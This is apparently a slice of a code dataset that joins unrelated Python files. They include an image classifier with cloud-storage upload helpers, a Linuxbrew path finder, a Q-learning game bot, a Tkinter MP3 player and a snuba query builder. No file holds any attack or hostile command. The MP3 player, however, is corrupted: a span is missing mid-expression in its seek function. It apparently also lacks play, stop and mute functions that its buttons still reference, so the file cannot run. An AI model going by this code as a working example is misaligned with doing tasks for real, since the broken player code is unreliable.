\n        image = cv2.resize(image, (100, 100))\n        image = image.astype(\"float\") / 255.0\n        image = img_to_array(image)\n        image = np.expand_dims(image, axis=0)\n\n        # classify the input image\n        (unknown, car, cat) = model.predict(image)[0]\n\n        # build the label\n        if car > unknown and car > cat:\n            label = \"CAR\"\n            proba = car\n        elif cat > unknown and cat > car:\n            label = \"CAT\"\n            proba = cat\n        else:\n            label = \"What?\"\n            proba = unknown\n\n        label = \"{}: {:.2f}%\".format(label, proba * 100)\n\n        # draw the label on the image\n        output = imutils.resize(orig, width=400)\n\n        cv2.putText(output, label, (10, 25), cv2.FONT_HERSHEY_SIMPLEX,\n                    1, (0, 255, 0), 3)\n\n        f = tempfile.NamedTemporaryFile(mode='w+b', delete=False, dir='static', suffix='.jpg')\n        cv2.imwrite( f.name, output)\n\n        del model\n        K.clear_session()\n\n        return(f.name)\n\n\nclass ObjectStore:\n\n    def __init__(self, OBJECT_STORE, filepath):\n        self.store = OBJECT_STORE\n        self.filepath = filepath\n\n    def upload(self):\n\n        filepath = self.filepath\n        store = self.store\n\n        if store == 's3':\n            result = self.s3_upload(filepath)\n        elif store == 'blob':\n            result = self.blob_upload(filepath)\n        elif store == 'goog':\n            result = self.goog_upload(filepath)\n        elif store == 'local':\n            filename = os.path.basename(filepath)\n            return(filename)\n        else:\n            raise\n\n        return(result)\n\n    def s3_upload(self, filepath):\n\n        S3_BUCKET_NAME = os.environ.get(\"S3_BUCKET_NAME\")\n        S3_KEY = os.environ.get(\"S3_KEY\")\n        S3_SECRET = os.environ.get(\"S3_SECRET\")\n        S3_LOCATION = 'http://{}.s3.amazonaws.com/'.format(S3_BUCKET_NAME)\n\n        s3 = boto3.client(\n            \"s3\",\n            aws_access_key_id=S3_KEY,\n            aws_secret_access_key=S3_SECRET\n        )\n\n        filename = os.path.basename(filepath)\n\n        try:\n            s3.upload_file(\n                filepath,\n                S3_BUCKET_NAME,\n                filename,\n                ExtraArgs={\n                    \"ACL\": \"public-read\"\n                }\n            )\n            s3_result = \"{}{}\".format(S3_LOCATION, filename)\n            return(s3_result)\n\n        except Exception as e:\n            print(\"S3 ERROR: \", e)\n            raise\n\n\n    def blob_upload(self, filepath):\n\n        BLOB_CONTAINER = os.environ.get(\"BLOB_CONTAINER\")\n        BLOB_KEY = os.environ.get(\"BLOB_KEY\")\n        BLOB_ACCOUNT = os.environ.get(\"BLOB_ACCOUNT\")\n\n        filename = os.path.basename(filepath)\n\n        try:\n\n            block_blob_service = BlockBlobService(\n                account_name=BLOB_ACCOUNT,\n                account_key=BLOB_KEY)\n\n            block_blob_service.create_blob_from_path(\n                BLOB_CONTAINER,\n                filename,\n                filepath)\n\n            blob_result = \"https://{}.blob.core.windows.net/results/{}\".format(BLOB_ACCOUNT, filename)\n\n        except Exception as e:\n            print(\"BLOB ERROR: \", e)\n            raise  # re-raise so the return below is never reached with blob_result undefined\n\n        return(blob_result)\n\n\n    def goog_upload(self, filepath):\n\n        bucket_name = os.environ.get(\"GOOG_BUCKET_NAME\")\n        destination_blob_name = os.path.basename(filepath)\n\n        try:\n            storage_client = storage.Client()\n            bucket = storage_client.get_bucket(bucket_name)\n            blob = bucket.blob(destination_blob_name)\n            blob.upload_from_filename(filepath)\n            return(blob.public_url)\n        except Exception as e:\n            print(\"Google Storage ERROR: \", e)\n","sub_path":"app/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"650125574","text":"# Copyright (c) YugaByte, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except\n# in compliance with the License.
You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. See the License for the specific language governing permissions and limitations\n# under the License.\n#\n\n\"\"\"\nHelps find the Linuxbrew installation.\n\"\"\"\n\nimport os\nimport sys\nfrom yb.command_util import run_program\nfrom yb.common_util import safe_path_join\n\n\ng_linuxbrew_dir = None\ng_build_root = None\n\nYB_SRC_ROOT = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..')\n\n\nclass LinuxbrewHome:\n def __init__(self, build_root=None):\n old_build_root = os.environ.get('BUILD_ROOT')\n if build_root is not None:\n os.environ['BUILD_ROOT'] = build_root\n else:\n build_root = os.environ.get('BUILD_ROOT')\n self.linuxbrew_dir = None\n self.linuxbrew_link_target = None\n self.cellar_glibc_dir = None\n self.ldd_path = None\n self.ld_so_path = None\n self.patchelf_path = None\n\n try:\n find_script_result = run_program(os.path.join(\n YB_SRC_ROOT, 'build-support', 'find_linuxbrew.sh'))\n linuxbrew_dir = find_script_result.stdout.strip()\n if not linuxbrew_dir:\n return\n if not os.path.isdir(linuxbrew_dir) and os.path.exists('/etc/centos-release'):\n raise RuntimeError(\n (\"Directory returned by the '{}' script does not exist: '{}'. \" +\n \"This is only an error on CentOS. Details: {}\").format(\n find_script_result.program_path,\n linuxbrew_dir,\n find_script_result))\n self.linuxbrew_dir = os.path.realpath(linuxbrew_dir)\n\n # Directories derived from the Linuxbrew top-level one.\n self.linuxbrew_link_target = os.path.realpath(linuxbrew_dir)\n self.cellar_glibc_dir = safe_path_join(self.linuxbrew_dir, 'Cellar', 'glibc')\n self.ldd_path = safe_path_join(self.linuxbrew_dir, 'bin', 'ldd')\n self.ld_so_path = safe_path_join(self.linuxbrew_dir, 'lib', 'ld.so')\n self.patchelf_path = safe_path_join(self.linuxbrew_dir, 'bin', 'patchelf')\n finally:\n if old_build_root is None:\n if 'BUILD_ROOT' in os.environ:\n del os.environ['BUILD_ROOT']\n else:\n os.environ['BUILD_ROOT'] = old_build_root\n\n def path_is_in_linuxbrew_dir(self, path):\n path = os.path.abspath(path)\n return (path.startswith(self.linuxbrew_dir + '/') or\n path.startswith(self.linuxbrew_link_target + '/'))\n\n def get_human_readable_dirs(self):\n return ', '.join(\"'%s'\" % d for d in\n sorted(set([self.linuxbrew_dir, self.linuxbrew_link_target])))\n\n\ndef set_build_root(build_root):\n global g_build_root\n g_build_root = build_root\n\n\ndef get_linuxbrew_dir():\n if not sys.platform.startswith('linux'):\n return None\n\n global g_linuxbrew_dir\n if not g_linuxbrew_dir:\n g_linuxbrew_dir = LinuxbrewHome(g_build_root).linuxbrew_dir\n return g_linuxbrew_dir\n","sub_path":"python/yb/linuxbrew.py","file_name":"linuxbrew.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"107371103","text":"import numpy as np\nfrom time import time\nfrom keras.layers import InputLayer, Dense\nfrom keras.models import Sequential\n\nfrom .state_controller import StateController\nfrom .deep_ql_controller import DeepQLController\n\nfrom ..sprites.obstacle import Obstacle\nfrom ..sprites.point import Point\n\nfrom ..utils.utils import get_rot_mat\n\nclass TrainedDQLController(StateController):\n\n # Available actions\n 
avail_actions = ['turn_left', 'turn_right', 'move_left', 'move_right', 'move_forw', 'move_back', 'shoot', 'still']\n\n # Variables given to the learner\n state_vars = ['pos_x', 'pos_y', 'rot', 'health', 'closest_enemy_direction', 'closest_enemy_dist', 'is_closest_enemy_visible',\n 'closest_proj_x', 'closest_proj_y', 'closest_proj_dot', 'obs_in_front', 'obs_on_right', 'obs_on_left']\n\n\n def __init__(self, team, game, position=None, rotation=None, model=None):\n super(TrainedDQLController, self).__init__(team,game,position,rotation)\n\n self.train_err = []\n\n if model == None:\n self.init_q_funct()\n else:\n self.q_func = model\n\n\n\n def init_q_funct(self):\n # Number of network inputs\n # The variables of the state we will get\n n_inputs = len(self.state_vars)\n\n # Number of network outputs\n n_outputs = len(self.avail_actions)\n\n model = Sequential()\n model.add(InputLayer((n_inputs,)))\n model.add(Dense(32, activation='relu'))\n model.add(Dense(32, activation='relu'))\n model.add(Dense(32, activation='tanh'))\n model.add(Dense(n_outputs, activation='linear'))\n\n model.compile(optimizer='Adam', loss='mse')\n\n self.q_func = model\n\n\n def take_action(self):\n super(TrainedDQLController, self).take_action()\n \n curr_state = self.get_env_state()\n curr_state = np.reshape(curr_state, (1, len(curr_state)))\n\n action_vals = self.extract_actions()\n action_vals = np.reshape(action_vals, (1, len(action_vals)))\n\n hist = self.q_func.fit(curr_state, action_vals, epochs=1, verbose=0)\n\n self.train_err.extend(hist.history['loss'])\n\n\n def extract_actions(self):\n l_turn = 1 if self.get_ang_speed() == -1 else 0\n r_turn = 1 if self.get_ang_speed() == 1 else 0\n\n half = np.sqrt(2)\n\n l_move = 1 if self.get_speed()[0] < -half else 0\n r_move = 1 if self.get_speed()[0] >= half else 0\n\n f_move = 1 if self.get_speed()[1] >= half else 0\n b_move = 1 if self.get_speed()[1] < -half else 0\n\n shoot = 1 if self.current_state == 'Shoot' else 0\n\n still = 1 if l_move == r_move == f_move == b_move == shoot == 0 else 0\n\n actions = np.array([l_turn, r_turn, l_move, r_move, f_move, b_move, shoot, still])\n\n # Choose a random action with value 1 and set it as active, set the rest to zero\n rand_id = np.random.choice(np.arange(len(actions))[actions==1])\n\n ret_actions = np.zeros(len(actions))\n ret_actions[rand_id] = 1\n\n return ret_actions\n\n def get_env_state(self):\n scr_height, scr_width = self.game.window_size\n opp_id = np.argmin([np.linalg.norm(self.get_position() - x.get_position()) for x in self.get_opponents()])\n opponent = self.get_opponents()[opp_id]\n\n # Compute the state vars\n x = self.get_position()[0] / scr_width\n y = self.get_position()[1] / scr_height\n rot = self.get_rotation() / (2*np.pi)\n health = self.health / self.MAX_HEALTH\n\n vect_dist = opponent.get_position() - self.get_position()\n opp_dist = np.linalg.norm(vect_dist) / np.linalg.norm([scr_width, scr_height])\n opp_dir = np.arctan2(vect_dist[1], vect_dist[0])\n opp_dir = (-opp_dir + np.pi / 2) % (np.pi * 2) / (np.pi * 2)\n\n opp_visible = 1 if self.is_target_visible(opponent) else 0\n proj = self.get_closest_enemy_projectile()\n\n if proj is None:\n proj_x = -1\n proj_y = -1\n proj_dot = 0\n else:\n\n proj_x = proj.get_position()[0] / scr_width\n proj_y = proj.get_position()[1] / scr_height\n\n dir_vec = self.get_position() - proj.get_position()\n\n proj_speed = np.asarray(proj.get_speed() * get_rot_mat(proj.get_rotation())).flatten()\n\n proj_dot = np.dot(proj_speed, dir_vec / np.linalg.norm(dir_vec))/2 + 
0.5\n\n # Get obstacles around\n # Create a point in front, one on the right and one on the left\n\n rel_pos_front = np.array([0, self.RADIUS * 4])\n rel_pos_right = np.array([self.RADIUS * 4, 0])\n rel_pos_left = np.array([-self.RADIUS * 4, 0])\n\n all_pos = np.vstack([rel_pos_front, rel_pos_right, rel_pos_left])\n\n rel_rot_pos = np.asarray(all_pos * get_rot_mat(self.get_rotation()))\n\n point_front = Point(self.get_position() + rel_rot_pos[0, :])\n point_right = Point(self.get_position() + rel_rot_pos[1, :])\n point_left = Point(self.get_position() + rel_rot_pos[2, :])\n\n obs_front = 1 if self.game.collides_with(point_front, 'obstacle') else 0\n\n obs_right = 1 if self.game.collides_with(point_right, 'obstacle') else 0\n\n obs_left = 1 if self.game.collides_with(point_left, 'obstacle') else 0\n\n state = np.array([x, y, rot, health, opp_dist, opp_dir, opp_visible, proj_x, proj_y, proj_dot, obs_front, obs_right, obs_left])\n\n return state\n\n def save_model(self, name):\n self.q_func.save('deep_q_models/{}.h5'.format(name))\n\n def get_bot_type(self):\n return 'Deep QL Controller'","sub_path":"project/ai/trained_dql_controller.py","file_name":"trained_dql_controller.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"448220828","text":"# all imports\r\nimport os\r\nimport threading\r\nimport time\r\nimport tkinter.messagebox\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nfrom tkinter import ttk\r\nfrom ttkthemes import themed_tk as tk\r\nfrom mutagen.mp3 import MP3\r\nfrom pygame import mixer\r\nfrom mutagen.easyid3 import EasyID3\r\nfrom re import sub\r\n# Global variables\r\nqueue = []\r\nmuted = FALSE\r\npaused = FALSE\r\nfilename_path=\"\"\r\nplay_song=\"\"\r\ncurrent_time=0\r\nt1=''\r\nclose=False\r\ntotal_length=10\r\nselected=0\r\ni=0\r\nabm=\"\"\r\nnextmusic=0\r\nfile='playlist/all.txt'\r\n#initializing window \r\nroot = tk.ThemedTk()\r\nroot.get_themes()# Returns a list of all themes that can be set\r\nroot.set_theme(\"breeze\") # Sets an available theme\r\nroot.geometry('585x400+200+200') # window geometry\r\nroot.title(\"SUR MPlayer\")\r\nroot.iconbitmap(r'images/sur.ico')\r\nmixer.init() # initializing the mixer\r\n\r\n# functions\r\ndef on_closing():\r\n global paused\r\n global close\r\n paused = True\r\n close=True\r\n stop_music()\r\n root.destroy()\r\n \r\ndef pause_music():\r\n global paused\r\n paused = TRUE\r\n mixer.music.pause()\r\n statusbar['text'] = \"Music Paused\"\r\ndef rewind_music():\r\n global current_time\r\n global selected\r\n if current_time<=7:\r\n if selected==0:\r\n play_music()\r\n else:\r\n playlistbox.selection_clear(0, tkinter.END)\r\n playlistbox.select_set(selected-1)\r\n play_music()\r\n else:\r\n play_music()\r\n statusbar['text'] = \"Music Rewinded\"\r\n\r\ndef set_vol(val):\r\n \r\n volume = round(float(val),0)\r\n lowvol['text']=volume\r\n volume=volume / 100\r\n mixer.music.set_volume(volume)\r\n \r\ndef seek_play(val):\r\n global current_time\r\n global play_song\r\n val=int(round(float(val)))\r\n if val>current_time+2 or val2:\r\n current_time=total_length+10\r\n nextmusic=0\r\n else:\r\n mixer.music.stop()\r\n current_time+=10\r\n mixer.music.play(loops=0, start=current_time)\r\n nextmusic+=1\r\n print(nextmusic-1)\r\n \r\n\r\ndef del_song():\r\n global filename_path\r\n global queue\r\n global file\r\n try:\r\n selected_song = playlistbox.curselection()\r\n selected_song = int(selected_song[0])\r\n f=open(file,'r')\r\n 
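\r\n        # rewrite the playlist file through a temporary copy, keeping every line except the deleted song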
c=open('playlist/all1.txt','a')\r\n        var=f.read()\r\n        for lines in var.split('\\n'):\r\n            if lines!=queue[selected_song]:\r\n                if lines!=\"\":\r\n                    c.write(lines+\"\\n\")\r\n        f.close()\r\n        c.close()\r\n        os.remove(file)\r\n        os.rename('playlist/all1.txt',file)\r\n\r\n        playlistbox.delete(selected_song)\r\n        queue.pop(selected_song)\r\n        tkinter.messagebox.showinfo('Info','Deletion successful')\r\n    except:\r\n        tkinter.messagebox.showerror('Error','Please select a song from the list to remove it')\r\n\r\n\r\ndef moreabt_song():\r\n    global abm\r\n    global abtm\r\n    global play_it\r\n    selected_song = playlistbox.curselection()\r\n    if not selected_song:\r\n        tkinter.messagebox.showerror('Error','Please select a song from the list to display its info')\r\n    else:\r\n        selected_song = int(selected_song[0])\r\n        play_it = queue[selected_song]\r\n        try:\r\n            abtmusic = EasyID3(play_it)\r\n            filename = abtmusic['title'][0]\r\n            abtm=tk.ThemedTk()\r\n            abtm.geometry('300x280+200+200')\r\n            abtm.title(\"About ~~ \"+filename)\r\n            abtm.iconbitmap(r'images/sur.ico')\r\n            abm=Listbox(abtm,width=50,height=15)\r\n            abm.place(x=0,y=0)\r\n            for key in sorted(abtmusic.keys()):\r\n                val = abtmusic[key]\r\n                abm.insert(END,key+\" : \"+val[0])\r\n            editBtn = ttk.Button(abtm,text=\"Edit Data\" ,command=ed_gui)\r\n            editBtn.place(x=10,y=250)\r\n        except:\r\n            tkinter.messagebox.showerror('File not found', 'play the song to get info')\r\n\r\ndef ed_gui():\r\n    global abm\r\n    global abtm\r\n    global play_it\r\n    global selected_song\r\n    global entry_edval\r\n    def edit_save():\r\n        abtmusic = EasyID3(play_it)\r\n        try:\r\n            abtmusic[selected_song] = str(entry_edval.get())  # assign the new tag value (was '==', a no-op comparison)\r\n            abtmusic.save()\r\n        except:\r\n            tkinter.messagebox.showerror('Error in Saving','Saving cannot be completed because:\\n1) Windows is treating the program as a security threat\\n2) Your antivirus is treating the program as a security threat\\n3) Sorry, nothing can be done about that')\r\n        eabtm.destroy()\r\n    selected_song=abm.curselection()\r\n    if not selected_song:\r\n        tkinter.messagebox.showerror('Error','Please select a tag from the list to edit it')\r\n        return  # nothing selected, avoid the IndexError below\r\n    selected_song = int(selected_song[0])\r\n    abtmusic = EasyID3(play_it)\r\n    l1=list(abtmusic.keys())\r\n    l1=sorted(l1)\r\n    selected_song=l1[selected_song]\r\n    eabtm=tk.ThemedTk()\r\n    eabtm.geometry('300x100+200+200')\r\n    eabtm.title(\"Edit Value\")\r\n    title = ttk.Label(eabtm, text=selected_song)\r\n    title.pack()\r\n    entry_edval=ttk.Entry(eabtm)\r\n    entry_edval.pack()\r\n    saveBtn = ttk.Button(eabtm,text=\"SAVE\" ,command=edit_save)\r\n    saveBtn.pack()\r\n    abtm.destroy()\r\n\r\ndef about_us():\r\n    tkinter.messagebox.showinfo('About SUR','This is an open source music player built using Python Tkinter by \\nSHUBHAM KOTHARI\\nANIKET KURKUTE\\nATUL GADEKAR')\r\n\r\ndef browse_file():\r\n    global filename_path\r\n    global queue\r\n    global file\r\n    def add_to_q():\r\n        global queue\r\n        add_to_playlist(filename_path)\r\n        mixer.music.queue(filename_path)\r\n    if filename_path==\"\":\r\n        filename_path = filedialog.askopenfilename()\r\n        if filename_path!=\"\":\r\n            f=open(file,'a')\r\n            f.write(filename_path+\"\\n\")\r\n            f.close()\r\n            add_to_q()\r\n    else:\r\n        add_to_q()\r\n    filename_path=\"\"\r\n\r\ndef add_to_playlist(filename):\r\n    global queue\r\n    file_data = os.path.splitext(filename)\r\n    if file_data[1] == '.mp3':\r\n        abtmusic = EasyID3(filename_path)\r\n        filename = abtmusic['title'][0]\r\n    else:\r\n        filename = os.path.basename(filename)\r\n    playlistbox.insert(END, filename)\r\n    queue.append(filename_path)\r\n        
playlistbox.config(yscrollcommand=scrollbar.set)\r\n scrollbar.config(command=playlistbox.yview)\r\ndef open_lyrics():\r\n play_it=''\r\n def edit_lyrics():\r\n def save_lyrics():\r\n val=display_label.get(1.0,END)\r\n play_it = queue[selected_song]\r\n abtmusic = EasyID3(play_it)\r\n var=abtmusic['title'][0]\r\n f=open(\"lyrics/\"+var+\".txt\",'a')\r\n f.write(val)\r\n f.close()\r\n eabtm.destroy()\r\n open_lyrics()\r\n global display_label\r\n eabtm=tk.ThemedTk()\r\n eabtm.geometry('450x400+200+200')\r\n eabtm.title(\"ADD LYRICS\")\r\n title = ttk.Label(eabtm, text=\"To Add Lyrics Copy Lyrics From Internet And Paste In Below text area\")\r\n title.pack()\r\n display_label = Text(eabtm, width=50,height=20, font=\"ariel\", fg=\"black\", bg=\"white\")\r\n display_label.pack()\r\n saveBtn = ttk.Button(eabtm,text=\"Save\",command=save_lyrics)\r\n saveBtn.pack()\r\n lyrm.destroy()\r\n selected_song = playlistbox.curselection()\r\n if not selected_song:\r\n tkinter.messagebox.showerror('Error','Please Select A song from list to display about song')\r\n else:\r\n selected_song = int(selected_song[0])\r\n play_it = queue[selected_song]\r\n abtmusic = EasyID3(play_it)\r\n var=abtmusic['title'][0]\r\n lyrm=tk.ThemedTk()\r\n lyrm.title('LYRICS ~~'+var)\r\n lyrm.geometry('590x280+200+200')\r\n lyrm.iconbitmap(r'images/sur.ico')\r\n abm=Listbox(lyrm,width=100,height=15)\r\n abm.place(x=0,y=0)\r\n LYscrollbar = Scrollbar(lyrm)\r\n LYscrollbar.pack(side=RIGHT,fill=Y)\r\n try:\r\n f=open(\"lyrics/\"+var+\".txt\",'r')\r\n for x in f:\r\n abm.insert(END,x.split())\r\n f.close()\r\n abm.config(yscrollcommand=LYscrollbar.set)\r\n LYscrollbar.config(command=abm.yview)\r\n except:\r\n abm.insert(END,\"no lyrics\")\r\n editBtn = ttk.Button(lyrm,text=\"Edit Data\",command=edit_lyrics)\r\n editBtn.place(x=10,y=250)\r\n\r\ndef avplaylist(): \r\n path = 'playlist/.'\r\n allplaylist=[]\r\n def add_playlist():\r\n def create_playlist():\r\n name=entry_edval.get()\r\n if name==\"\":\r\n tkinter.messagebox.showerror('Error','Name Is Not Valid')\r\n else:\r\n f=open('playlist/'+name+'.txt','a')\r\n tkinter.messagebox.showinfo('Info','Playlist created sucessfully')\r\n f.close()\r\n edwin.destroy()\r\n avplaylist()\r\n edwin=tk.ThemedTk()\r\n edwin.geometry('300x100+200+200')\r\n edwin.title(\"Edit Value\")\r\n title = ttk.Label(edwin, text='Enter name for playlist')\r\n title.pack()\r\n entry_edval=ttk.Entry(edwin,)\r\n entry_edval.pack()\r\n saveBtn = ttk.Button(edwin,text=\"SAVE\",command=create_playlist)\r\n saveBtn.pack()\r\n avplaylistgui.destroy()\r\n def play_playlist():\r\n global file\r\n global current_time\r\n global total_length\r\n global queue\r\n try:\r\n selected_playlist = avplaylist_listbox.curselection()\r\n selected_playlist = int(selected_playlist[0])\r\n play_it = allplaylist[selected_playlist]\r\n mixer.music.stop()\r\n playlistbox.delete(0,tkinter.END)\r\n queue.clear()\r\n file=play_it\r\n on_start(play_it)\r\n playlistbox.select_set(0)\r\n if not queue:\r\n titletxt['text']='No title'\r\n albumtxt['text']='No album'\r\n artisttxt['text']='No artist'\r\n else: \r\n play_music()\r\n avplaylistgui.destroy()\r\n except:\r\n tkinter.messagebox.showerror('Error','Please Select A Playlist from list to play it')\r\n avplaylistgui=tk.ThemedTk()\r\n avplaylistgui.title('ALL PLAYLISTS')\r\n avplaylistgui.geometry('280x280+200+200')\r\n avplaylistgui.iconbitmap(r'images/sur.ico')\r\n avplaylist_listbox=Listbox(avplaylistgui,width=100,height=15)\r\n avplaylist_listbox.place(x=0,y=0)\r\n addBtn = 
ttk.Button(avplaylistgui,text=\"Add Playlist\",command=add_playlist)\r\n addBtn.place(x=10,y=250)\r\n playplaylistBtn = ttk.Button(avplaylistgui,text=\"Play Playlist\",command=play_playlist)\r\n playplaylistBtn.place(x=90,y=250)\r\n files = os.listdir(path)\r\n for name in files:\r\n allplaylist.append(\"playlist/\"+name)\r\n name=name.split('.')\r\n avplaylist_listbox.insert(END,name[0])\r\n\r\n\r\ndef on_start(file='playlist/all.txt'):\r\n global filename_path\r\n f=open(file,'r')\r\n for x in f:\r\n filename_path=x.strip()\r\n browse_file()\r\n filename_path=\"\"\r\n f.close()\r\n\r\ndef main_thread():\r\n global queue\r\n global close\r\n global current_time\r\n global total_length\r\n global selected\r\n while close==False:\r\n i=0\r\n if current_time+3>total_length:\r\n if selected==len(queue)-1:\r\n i=0-selected\r\n playlistbox.selection_clear(0, tkinter.END)\r\n playlistbox.select_set(0)\r\n else: \r\n i=1+selected\r\n playlistbox.selection_clear(0, tkinter.END)\r\n playlistbox.select_set(i)\r\n stop_music()\r\n play_music()\r\n else:\r\n continue\r\n print(\"break\")\r\n\r\n \r\n\r\n# menu bar\r\nmenubar = Menu(root)\r\nroot.config(menu=menubar)\r\nsubMenu = Menu(menubar, tearoff=0)\r\nmenubar.add_cascade(label=\"File\", menu=subMenu)\r\nsubMenu.add_command(label=\"Open\", command=browse_file)\r\nsubMenu.add_command(label=\"Exit\", command=root.destroy)\r\nsubMenu = Menu(menubar, tearoff=0)\r\nmenubar.add_cascade(label=\"Help\", menu=subMenu)\r\nsubMenu.add_command(label=\"About Us\", command=about_us)\r\n# widgets\r\nplaylistbox = Listbox(root,yscrollcommand='yes',width=78)\r\nplaylistbox.place(x=10,y=10)\r\nscrollbar = Scrollbar(root)\r\nscrollbar.pack(side=RIGHT,fill=Y)\r\nmoreBtn = ttk.Button(root, text=\"More About Song\", command=moreabt_song)\r\nmoreBtn.place(x=25,y=190)\r\nlyricsBtn = ttk.Button(root, text=\"LYRICS\", command=open_lyrics)\r\nlyricsBtn.place(x=155,y=190)\r\naddBtn = ttk.Button(root, text=\"+ Add\", command=browse_file)\r\naddBtn.place(x=255,y=190)\r\ndelBtn = ttk.Button(root, text=\"- Remove\", command=del_song)\r\ndelBtn.place(x=355,y=190)\r\nplaylistBtn = ttk.Button(root, text=\"Playlist\", command=avplaylist)\r\nplaylistBtn.place(x=455,y=190)\r\ntitlelab= ttk.Label(root, text=\"Title : \",font='Times 12 bold')\r\ntitlelab.place(x=10,y=225)\r\ntitletxt= ttk.Label(root, text=\"No Title\",font='Times 12 bold')\r\ntitletxt.place(x=55,y=225)\r\nalbumlab= ttk.Label(root, text=\"Album : \",font='Times 11')\r\nalbumlab.place(x=10,y=245)\r\nalbumtxt= ttk.Label(root, text=\"No Album\",font='Times 11')\r\nalbumtxt.place(x=60,y=245)\r\nartistlab= ttk.Label(root, text=\"Artist : \",font='Times 11')\r\nartistlab.place(x=10,y=265)\r\nartisttxt= ttk.Label(root, text=\"No Artist\",font='Times 11')\r\nartisttxt.place(x=55,y=265)\r\ncurrenttimelabel = ttk.Label(root, text='--:--')\r\ncurrenttimelabel.place(x=2,y=285)\r\nplay_scale = ttk.Scale(root, from_=0, to=100, orient=HORIZONTAL,length=500,command=seek_play)\r\nplay_scale.place(x=35,y=285)\r\nlengthlabel = ttk.Label(root, text='--:--')\r\nlengthlabel.place(x=538,y=285)\r\nprevPhoto = PhotoImage(file='images/previous.png').subsample(3,3)\r\nprevBtn = ttk.Button(root, image=prevPhoto, command=rewind_music)\r\nprevBtn.place(x=10,y=315)\r\nplayPhoto = PhotoImage(file='images/play.png').subsample(2,2)\r\nplayBtn = ttk.Button(root, image=playPhoto, command=play_music)\r\nplayBtn.place(x=60,y=310)\r\npausePhoto = PhotoImage(file='images/pause.png').subsample(2,2)\r\npauseBtn = ttk.Button(root, image=pausePhoto, 
command=pause_music)\r\npauseBtn.place(x=120,y=310)\r\nnextPhoto = PhotoImage(file='images/next.png').subsample(3,3)\r\nnextBtn = ttk.Button(root, image=nextPhoto, command=next_music)\r\nnextBtn.place(x=180,y=315)\r\nstopPhoto = PhotoImage(file='images/stop.png').subsample(3,3)\r\nstopBtn = ttk.Button(root, image=stopPhoto, command=stop_music)\r\nstopBtn.place(x=230,y=315)\r\nmutePhoto = PhotoImage(file='images/mute.png').subsample(2,2)\r\nvolumePhoto = PhotoImage(file='images/volume.png').subsample(2,2)\r\nvolumeBtn = ttk.Button(root, image=volumePhoto, command=mute_music)\r\nvolumeBtn.place(x=380,y=320)\r\nlowvol = ttk.Label(root, text=\"0\")\r\nlowvol.place(x=420,y=325)\r\nvolscale = ttk.Scale(root, from_=0, to=100, orient=HORIZONTAL, command=set_vol)\r\nvolscale.set(70)\r\nset_vol('70') # implement the default value of scale when music player starts\r\nmixer.music.set_volume(0.7)\r\nvolscale.place(x=445,y=325)\r\nhighvol = ttk.Label(root, text=\"100\")\r\nhighvol.place(x=545,y=325)\r\n\r\n# status bar\r\nstatusbar = ttk.Label(root, text=\"Welcome to SUR MPlayer\", relief=SUNKEN, anchor=W, font='Times 10 italic')\r\nstatusbar.pack(side=BOTTOM, fill=X)\r\n\r\n# end\r\nroot.protocol(\"WM_DELETE_WINDOW\", on_closing)\r\non_start()\r\ntm = threading.Thread(target=main_thread,)\r\ntm.start()\r\nroot.mainloop()\r\n","sub_path":"main -.py","file_name":"main -.py","file_ext":"py","file_size_in_byte":18675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"116422211","text":"def query(start, end, groupby, conditions=None, filter_keys=None, aggregations=None, rollup=None, arrayjoin=None, limit=None, orderby=None):\n '\\n Sends a query to snuba.\\n\\n `conditions`: A list of (column, operator, literal) conditions to be passed\\n to the query. Conditions that we know will not have to be translated should\\n be passed this way (eg tag[foo] = bar).\\n\\n `filter_keys`: A dictionary of {col: [key, ...]} that will be converted\\n into \"col IN (key, ...)\" conditions. These are used to restrict the query to\\n known sets of project/issue/environment/release etc. Appropriate\\n translations (eg. from environment model ID to environment name) are\\n performed on the query, and the inverse translation performed on the\\n result. 
The project_id(s) to restrict the query to will also be\\n    automatically inferred from these keys.\\n\\n    `aggregations` a list of (aggregation_function, column, alias) tuples to be\\n    passed to the query.\\n    '\n    groupby = (groupby or [])\n    conditions = (conditions or [])\n    aggregations = (aggregations or [['count()', '', 'aggregate']])\n    filter_keys = (filter_keys or {\n    \n    })\n    snuba_map = {col: get_snuba_map(col, keys) for (col, keys) in six.iteritems(filter_keys)}\n    snuba_map = {k: v for (k, v) in six.iteritems(snuba_map) if ((k is not None) and (v is not None))}\n    rev_snuba_map = {col: dict((reversed(i) for i in keys.items())) for (col, keys) in six.iteritems(snuba_map)}\n    for (col, keys) in six.iteritems(filter_keys):\n        keys = [k for k in keys if (k is not None)]\n        if (col in snuba_map):\n            keys = [snuba_map[col][k] for k in keys if (k in snuba_map[col])]\n        if keys:\n            conditions.append((col, 'IN', keys))\n    if ('project_id' in filter_keys):\n        project_ids = filter_keys['project_id']\n    elif filter_keys:\n        ids = [get_related_project_ids(k, filter_keys[k]) for k in filter_keys]\n        project_ids = list(set.union(*map(set, ids)))\n    else:\n        project_ids = []\n    if (not project_ids):\n        raise SnubaError('No project_id filter, or none could be inferred from other filters.')\n    aggregate_cols = [a[1] for a in aggregations]\n    condition_cols = [c[0] for c in flat_conditions(conditions)]\n    all_cols = ((groupby + aggregate_cols) + condition_cols)\n    get_issues = ('issue' in all_cols)\n    issues = (get_project_issues(project_ids, filter_keys.get('issue')) if get_issues else None)\n    url = '{0}/query'.format(SNUBA)\n    request = {k: v for (k, v) in six.iteritems({\n        'from_date': start.isoformat(),\n        'to_date': end.isoformat(),\n        'conditions': conditions,\n        'groupby': groupby,\n        'project': project_ids,\n        'aggregations': aggregations,\n        'granularity': rollup,\n        'issues': issues,\n        'arrayjoin': arrayjoin,\n        'limit': limit,\n        'orderby': orderby,\n    